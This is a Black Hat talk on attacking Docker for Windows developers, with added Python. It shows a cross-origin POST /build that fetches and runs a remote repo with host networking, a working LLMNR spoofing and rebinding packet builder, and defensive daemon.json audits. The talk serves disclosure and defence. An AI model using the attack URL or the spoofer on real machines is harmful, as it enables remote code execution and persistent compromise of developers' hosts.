![Page 1: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/1.jpg)
Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor via Shadow Containers.
Michael Cherny @chernymi Sagie Dulce @SagieSec
WHO ARE WE?
Michael Cherny, Head of Research, Aqua Security, @chernymi
Sagie Dulce, Sr Security Researcher, Aqua Security, @SagieSec
FOCUS
Developers are the new Targets
Main Course: APT Developer Running Docker
New Attacks: Host Rebinding & Shadow Container
MENU
Containers & Container Development
Attacking Developers
① Abusing Docker API
② Host Rebinding Attack
③ Shadow Containers
Full Attack -> Click 2 PWN
Conclusions
CONTAINERS?
VIRTUAL MACHINES VS CONTAINERS
www.serverspace.co.uk/blog/containerisation-vs-virtualisation-whats-the-difference
CONTAINERS EVERYWHERE
Linux Containers: on Linux / Windows / Mac
Windows Containers: Native / Hyper-V (Windows Server), Hyper-V only (Windows 10)
CONTAINER ADOPTION STATS
https://www.slideshare.net/Docker/dockercon-2017-general-session-day-1-ben-golub
DEVELOPERS AS TARGETS
High privileges on their machines & domain
Low security attention
High confidence
Access to sensitive data: code, IP, registries
ATTACK OVERVIEW
ATTACKING CONTAINER DEVELOPERS
ATTACK OVERVIEW – WINDOWS 10
① Abuse Docker API -> Remote Code Execution
② Host Rebinding -> Privilege Escalation
③ Shadow Container -> Persistence
ABUSING DOCKER API
FROM A MALICIOUS WEB PAGE ①
DOCKER 4 WINDOWS / MAC
Client talks to daemon over a REST API, via:
UNIX socket
named pipe
..or TCP port
TCP port was default on Windows 10
Abuse Remotely?
DOCKER REST API – CAN WE ATTACK IT?
It’s complicated
Same Origin Policy?!
BROWSER SECURITY
Browsers need to display content from multiple domains
But, one domain shouldn’t be able to read / write to another
Post status in Facebook
Collect underpants...
etc.
SAME ORIGIN POLICY (SOP)
Only "simple" requests go cross-origin without a CORS preflight
GET – the request is sent, but the page can't read the response body
POST – a body only with a form-style Content-Type (text/plain, application/x-www-form-urlencoded, multipart/form-data), no custom headers, response unreadable
HEAD
Any other method, a JSON Content-Type or a custom header triggers an OPTIONS preflight, which fails because dockerd sends no CORS headers unless started with --api-cors-header
Not same origin: scheme (protocol), host or port differs
DOCKER API CALLS THAT DON'T VIOLATE SOP
(simple GET / HEAD / POST requests a browser sends cross-origin without preflight; the response stays unreadable, but the side effect happens)
List containers (GET)
Inspect container (GET)
List processes in container (GET)
Get container logs (GET)
Get container's changes in filesystem (GET)
Export container (GET)
Get container stats (GET)
Resize container (POST)
Start container (POST)
List images (GET)
Build image (POST)
Create image (POST)
Get image history (GET)
Push image (POST)
Stop container (POST)
Restart container (POST)
Kill a container (POST)
Rename container (POST)
Pause container (POST)
Unpause container (POST)
Attach to a container (POST)
Get file info in a container (HEAD)
Get filesystem archive (GET)
List networks (GET)
Inspect network (GET)
Tag image (POST)
List volumes (GET)
Export image (GET)
Inspect volume (GET)
List secrets (GET)
Inspect secret (GET)
Inspect Swarm (GET)
List nodes (GET)
Inspect node (GET)
List services (GET)
Inspect service (GET)
Get service logs (GET)
List tasks (GET)
Inspect a task (GET)
Search image (GET)
Caveat: the original slide also listed Delete container, Delete image and Create secret. Delete container and Delete image use the DELETE method, and Create secret needs a JSON body (Content-Type: application/json); none of these is a CORS "simple" request, so the browser preflights them and dockerd, which sends no CORS headers by default, never sees the real request.
https://docs.docker.com/engine/api/v1.29/
BUILD IMAGE
Build images from Dockerfile
… Build == Execute code!
FROM alpine:latest
ADD mycode.sh /mycode.sh
RUN apk update && apk add --no-cache …
RUN chmod +x /mycode.sh && /mycode.sh
Execute Yourself
BUILD IMAGE API CALL
POST /build
No body (and so no JSON Content-Type) => a simple POST, no SOP violation!
Interesting build parameters
t (tag)
remote – URL the daemon fetches the build context from; a git repository works!
networkmode (bridge / host / none)
BUILD IMAGE API CALL REVERSE SHELL DEMO
POST http://localhost:2375/build?remote=https://github.com/<User>/<Repo>&networkmode=host
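An added example, not from the slides, that makes the same-origin reasoning of the SOP slide and the /build demo concrete: `needs_preflight` applies the CORS "simple request" rules to a request, `reachable_from_web_page` runs them over a handful of Engine API calls (paths from the v1.29 reference), and `build_attack_url` assembles the body-less POST /build. All function names are ours; the daemon URL and repository URL in the usage are constructed placeholders.

```python
"""Which Docker Engine API calls can a hostile web page fire cross-origin?

A browser sends a cross-origin request without a CORS preflight only when the
request is "simple": method GET, HEAD or POST, no headers beyond the CORS
safelist, and a Content-Type limited to three form-style values. The page
cannot read the response, but the request reaches the daemon and its side
effect (a build, a start, a kill) happens anyway.
"""
from typing import Optional
from urllib.parse import urlencode

SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}
SAFELISTED_HEADERS = {"accept", "accept-language", "content-language", "content-type"}


def needs_preflight(method: str, headers: Optional[dict] = None) -> bool:
    """True if a browser would send an OPTIONS preflight before this request.

    A preflight is fatal here: dockerd sends no CORS headers unless started
    with --api-cors-header, so the browser never issues the real request.
    """
    if method.upper() not in SIMPLE_METHODS:
        return True
    headers = {k.lower(): v for k, v in (headers or {}).items()}
    if any(name not in SAFELISTED_HEADERS for name in headers):
        return True
    ctype = headers.get("content-type")
    if ctype is not None:
        media_type = ctype.split(";", 1)[0].strip().lower()  # drop "; charset=..."
        if media_type not in SIMPLE_CONTENT_TYPES:
            return True
    return False


# A slice of the Engine API (v1.29 paths) as a web page would have to call it.
# JSON-bodied endpoints must carry Content-Type: application/json, which the
# daemon insists on and which is not a safelisted value.
DOCKER_API_CALLS = {
    "List containers":  ("GET",    "/containers/json",        None),
    "Start container":  ("POST",   "/containers/{id}/start",  None),
    "Kill container":   ("POST",   "/containers/{id}/kill",   None),
    "Build image":      ("POST",   "/build",                  None),  # no body needed with remote=
    "Create container": ("POST",   "/containers/create",      "application/json"),
    "Create secret":    ("POST",   "/secrets/create",         "application/json"),
    "Delete container": ("DELETE", "/containers/{id}",        None),
    "Delete image":     ("DELETE", "/images/{name}",          None),
}


def reachable_from_web_page() -> dict:
    """Map each call to whether a cross-origin page can send it without preflight."""
    verdict = {}
    for name, (method, _path, ctype) in DOCKER_API_CALLS.items():
        headers = {"Content-Type": ctype} if ctype else None
        verdict[name] = not needs_preflight(method, headers)
    return verdict


def build_attack_url(daemon: str, remote: str, networkmode: str = "host",
                     tag: Optional[str] = None) -> str:
    """Compose the body-less POST /build from the demo slide.

    The daemon fetches `remote` itself (a git repository works), so the page
    never uploads a build context and the POST stays a simple request.
    `daemon` and `remote` are whatever the caller supplies; the usage below
    uses constructed placeholders.
    """
    params = {"remote": remote, "networkmode": networkmode}
    if tag:
        params["t"] = tag
    return f"{daemon.rstrip('/')}/build?{urlencode(params)}"


if __name__ == "__main__":
    for call, ok in reachable_from_web_page().items():
        print(f"{call:18s} {'simple request' if ok else 'preflight, blocked'}")
    print(build_attack_url("http://localhost:2375", "https://example.com/repo.git"))
```

The verdict table is the whole point of the slide: every call that does real damage without a JSON body (build, start, kill, push) slips through, while the calls that would let the page shape a container (`/containers/create`) are stopped by the Content-Type requirement alone. That is why the next step of the talk is a same-origin bypass rather than a smarter request.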
ABUSE DOCKER BUILD
ABUSE DOCKER BUILD DEMO
DOCKER FIX
We disclosed to Docker
Exposing the daemon over TCP is now an "opt-in"
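Added example (ours, not Docker's) of the daemon-side check that matches this fix: it reads a dockerd daemon.json and reports TCP listeners that lack TLS client verification, treating a 127.0.0.1 bind as still exposed, because the browser that issues the cross-origin request runs on the same machine. The three configs are constructed; the keys (hosts, tls, tlsverify, tlscacert/tlscert/tlskey) are dockerd's own. Docker for Windows surfaces the same TCP choice as a settings toggle rather than a daemon.json entry, which this check does not see.

```python
"""Audit a dockerd daemon.json for API listeners a browser tab could reach.

Lesson of the talk: a TCP listener without TLS is reachable by any process
on the machine and, via cross-origin requests, by any web page the user opens.
Binding to 127.0.0.1 does not change that; the browser lives there too.
"""
import json
from urllib.parse import urlsplit

# OS-mediated listeners: a browser cannot open these.
LOCAL_SCHEMES = {"unix", "npipe", "fd"}
WILDCARD_BINDS = {"0.0.0.0", "::"}


def audit_daemon_config(text: str) -> list:
    """Return a list of findings for the JSON in `text`; [] means nothing to report."""
    cfg = json.loads(text)
    findings = []
    tls_on = bool(cfg.get("tls")) or bool(cfg.get("tlsverify"))
    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme in LOCAL_SCHEMES:
            continue
        if parts.scheme != "tcp":
            findings.append(f"{host}: unrecognised listener scheme")
            continue
        if not tls_on:
            reach = "the LAN" if parts.hostname in WILDCARD_BINDS else "this machine"
            findings.append(
                f"{host}: plaintext TCP API reachable from {reach}; any local process, "
                f"or a browser tab via a cross-origin POST, can drive it"
            )
        elif not cfg.get("tlsverify"):
            findings.append(
                f"{host}: TLS without client-certificate verification (tlsverify unset), "
                f"so anyone who can connect is trusted"
            )
    return findings


# Constructed configs: the pre-fix Windows 10 default, the opt-out, and a TLS-only remote API.
WEAK_CONFIG = json.dumps({"hosts": ["npipe://", "tcp://127.0.0.1:2375"]})
HARDENED_CONFIG = json.dumps({"hosts": ["npipe://"]})
REMOTE_CONFIG = json.dumps({
    "hosts": ["npipe://", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "ca.pem", "tlscert": "server-cert.pem", "tlskey": "server-key.pem",
})

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG), ("remote", REMOTE_CONFIG)):
        print(label, audit_daemon_config(cfg) or ["ok"])
```

Run it against the live file (C:\ProgramData\docker\config\daemon.json on Windows, /etc/docker/daemon.json on Linux) after any Docker upgrade; the check only sees explicit settings, so an empty `hosts` list means dockerd is on its default local socket or pipe.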
HOST REBINDING ATTACK
DAEMON PRIVILEGE ESCALATION ②
WHAT'S NEXT?
LIMITATIONS
DNS REBINDING?
DNS REBINDING - HISTORY
Carbon Dated to ~1996
2007 Protecting Browsers from DNS Rebinding Attacks
2008 Defending your DNS in a post-Kaminsky world
2010 How to Hack Millions of Routers
DNS REBINDING – HOW IT WORKS
SOP BYPASSED!
WHY NOT USE DNS REBINDING?
DNS Rebinding may fail
Existing protections (perimeter)
Attacker needs to set up a domain
$$$
Maintenance
IP reputation & threat intelligence
LLMNR: DNS OVER THE LAN
Link-Local Multicast Name Resolution: DNS-like name resolution over the LAN, IPv4 & IPv6
ATTACKING LLMNR
Requests are multicast, and they go out over the virtual interface too!
Spoof LLMNR replies
Cached in the browser (IE / Chrome / FF) for ~60 seconds
Skip cache in FF: delay the HTTP response 0.5 sec
https://tools.ietf.org/html/rfc4795#section-2.2
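Added example, ours rather than the speakers' tooling: the LLMNR exchange in wire format per RFC 4795, which reuses the DNS message layout over UDP 5355. `build_query` is what the victim host multicasts, `build_spoofed_reply` is what any host on the same link (here, the attacker's container on the virtual interface) can answer with an address of its choosing, `parse_reply` decodes it as a resolver would, and `rebind` produces the two answers that make up the rebinding step (first the attacker's own address, then the target's). The hostname and addresses are constructed; sending over a socket is left out. The TTL is whatever the responder writes; as the slide notes, browsers cache the result for roughly 60 seconds regardless, so the second answer only takes effect once that cache has expired or been skipped.

```python
"""LLMNR (RFC 4795) query/response in wire format.

LLMNR reuses the DNS message layout over UDP 5355; queries go to the multicast
group 224.0.0.252 (IPv4) or ff02::1:3 (IPv6). The first answer with a matching
transaction ID and question wins, and nothing authenticates the responder.
"""
import ipaddress
import struct

LLMNR_PORT = 5355
LLMNR_GROUP_V4 = "224.0.0.252"
LLMNR_GROUP_V6 = "ff02::1:3"
QTYPE_A, QTYPE_AAAA, CLASS_IN = 1, 28, 1
FLAG_QR = 0x8000  # response bit; the C, TC and T bits stay clear here


def encode_name(name: str) -> bytes:
    """'dev-box' -> b'\\x07dev-box\\x00' (DNS label encoding, no compression)."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Read labels until the zero terminator; returns (name, offset after it)."""
    labels = []
    while buf[off] != 0:  # no compression pointers: our own packets never use them
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """Header (ID, flags=0, QDCOUNT=1) followed by one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def parse_query(pkt: bytes) -> dict:
    txid, flags, qdcount, *_ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        raise ValueError("expected an LLMNR query with exactly one question")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_spoofed_reply(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """Answer the captured query with an address of the responder's choosing.

    The reply echoes the transaction ID and the question so the sender's
    resolver accepts it; the address is whatever the name should become.
    """
    q = parse_query(query)
    addr = ipaddress.ip_address(answer_ip)
    rtype = QTYPE_A if addr.version == 4 else QTYPE_AAAA
    if q["qtype"] != rtype:
        raise ValueError("answer address family does not match the question type")
    qname = encode_name(q["name"])
    header = struct.pack("!HHHHHH", q["id"], FLAG_QR, 1, 1, 0, 0)
    question = qname + struct.pack("!HH", q["qtype"], q["qclass"])
    rr = qname + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(addr.packed)) + addr.packed
    return header + question + rr


def parse_reply(pkt: bytes) -> dict:
    """Decode a response the way a resolver would: id, response flag, answers."""
    txid, flags, qdcount, ancount, *_ = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qdcount):  # skip the echoed question(s)
        _, off = decode_name(pkt, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        addr = ipaddress.IPv4Address(rdata) if rdlen == 4 else ipaddress.IPv6Address(rdata)
        answers.append({"name": name, "type": rtype, "ttl": ttl, "address": str(addr)})
    return {"id": txid, "is_response": bool(flags & FLAG_QR), "answers": answers}


def rebind(query: bytes, attacker_ip: str, target_ip: str, ttl: int = 30):
    """The two answers of a rebinding: first the attacker's host serves the page,
    then the same name is re-answered with the target so the page's requests
    become same-origin with it."""
    return build_spoofed_reply(query, attacker_ip, ttl), build_spoofed_reply(query, target_ip, ttl)
```

To turn this into a live responder, join the multicast group on the interface that faces the victim, match each incoming query's name, and reply unicast to the source address and port; the browser-side caching the slide describes decides how long the first binding lingers before the second one is honoured.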
HOST REBINDING DEMO
SOP BYPASSED!
RECAP
① Abuse Docker API -> Remote Code Execution
② Host Rebinding -> Privilege Escalation
Full API Access: docker run …?
SHADOW CONTAINER
PERSISTENCE & CONCEALMENT③
MISSING PERSISTENCE & CONCEALMENT
So far…
Privileged container on the VM (Moby Linux)
Access to VM filesystem
Access to enterprise internal network
But…
Not concealed: docker ps lists it
Not persistent: VM boots from image
![Page 74: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/74.jpg)
74
PERSISTENT AND CONCEALED
myscript
75
PERSISTENT AND CONCEALED
shadow
myscript
78
SHADOW CONTAINER – SHUTDOWN SCRIPT
79
SHADOW CONTAINER – MYSCRIPT.SH
80
SHADOW CONTAINER DEMO
FULL ATTACK
CLICK TO PWN!
82
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
shadow
myscript
IMPACT
DEVELOPERS AS TARGETS
97
ADVANCED PERSISTENT THREAT
Persistency
Concealment
Low Forensic Footprint
Access to Internal Enterprise Network
98
SHADOW WORM
Attacker poisons images
Bad image spreads like a worm through the pipeline
99
ATTACK FLAVORS
Mac
• DNS Rebinding
• Shadow Container
Linux
• DNS Rebinding
• Full Access
Windows Containers
• Abuse API
• Host Rebinding
• Full Access
CONCLUSIONS
101
MITIGATION
Don’t expose the container engine API
Only allow authenticated clients (certificates) access to the exposed port (or block it via firewall)
Analyze container engine logs (on development machines too)
Disable NetBIOS & LLMNR
Continuously scan images in registries
Continuously monitor containers at runtime
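The first two mitigation points can be checked mechanically against the engine's `daemon.json`. The following Python audit is an added example, not code from the talk or from Aqua: it reads a daemon configuration, flags any `tcp://` listener that accepts clients without certificates, and notes separately that a loopback binding alone does not help against the browser-side rebinding the deck describes. The keys `hosts`, `tls`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` are real Docker daemon options; the three sample configurations and the certificate paths are constructed for illustration.

```python
"""Audit a Docker daemon.json for unauthenticated engine-API exposure.

Added example for the MITIGATION slide; not code from the talk or from Aqua.
"""
import json
from typing import List
from urllib.parse import urlsplit

# Constructed sample configurations (not taken from the deck). The daemon.json
# keys used here are real Docker options; certificate paths are assumptions.
WEAK_DAEMON_JSON = r"""
{
  "hosts": ["npipe://", "tcp://127.0.0.1:2375"],
  "tls": false
}
"""

NETWORK_EXPOSED_DAEMON_JSON = r"""
{
  "hosts": ["tcp://0.0.0.0:2375"]
}
"""

HARDENED_DAEMON_JSON = r"""
{
  "hosts": ["npipe://", "tcp://127.0.0.1:2376"],
  "tlsverify": true,
  "tlscacert": "C:\\ProgramData\\docker\\certs.d\\ca.pem",
  "tlscert": "C:\\ProgramData\\docker\\certs.d\\server-cert.pem",
  "tlskey": "C:\\ProgramData\\docker\\certs.d\\server-key.pem"
}
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
WILDCARD = {"0.0.0.0", "::"}


def audit_daemon_config(config_text: str) -> List[str]:
    """Return human-readable findings for one daemon.json document.

    Rules, derived from the mitigation slide:
      * a tcp:// listener without tlsverify is unauthenticated API exposure;
      * a tcp:// listener on a loopback address is still reachable from a
        browser via host/DNS rebinding, so it is reported as well;
      * a tcp:// listener bound to all interfaces widens exposure to the network.
    """
    cfg = json.loads(config_text)
    findings: List[str] = []
    tls_verify = bool(cfg.get("tlsverify", False))

    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            # npipe:// and unix:// are local IPC endpoints guarded by OS ACLs,
            # not reachable from a browser or from the network.
            continue
        bind = parts.hostname or "0.0.0.0"  # empty host part means all interfaces
        if not tls_verify:
            findings.append(f"{host}: engine API accepts clients without certificates")
            if bind in LOOPBACK:
                findings.append(
                    f"{host}: loopback binding alone does not stop a browser "
                    "reaching the API through host/DNS rebinding"
                )
        if bind in WILDCARD:
            findings.append(f"{host}: listener bound to all interfaces")

    if tls_verify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is not configured explicitly")
    return findings


if __name__ == "__main__":
    samples = (
        ("weak", WEAK_DAEMON_JSON),
        ("network", NETWORK_EXPOSED_DAEMON_JSON),
        ("hardened", HARDENED_DAEMON_JSON),
    )
    for name, text in samples:
        print(name, audit_daemon_config(text) or ["no findings"])
```

The hardened sample keeps a TCP listener only because some tooling needs one; where it is not needed, the slide's first point applies and the `tcp://` entry should be removed altogether, with a host firewall rule on the port as the complementary block.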
102
BLACK HAT SOUND BYTES
Developers are the new Targets
New Attacks: Host Rebinding & Shadow Container
Protect your PIPE: Scan images & Monitor Containers in Runtime
Michael Cherny @chernymi Sagie Dulce @SagieSec
http://info.aquasec.com/whitepaper-how-abusing-docker-api-led-to-remote-code-execution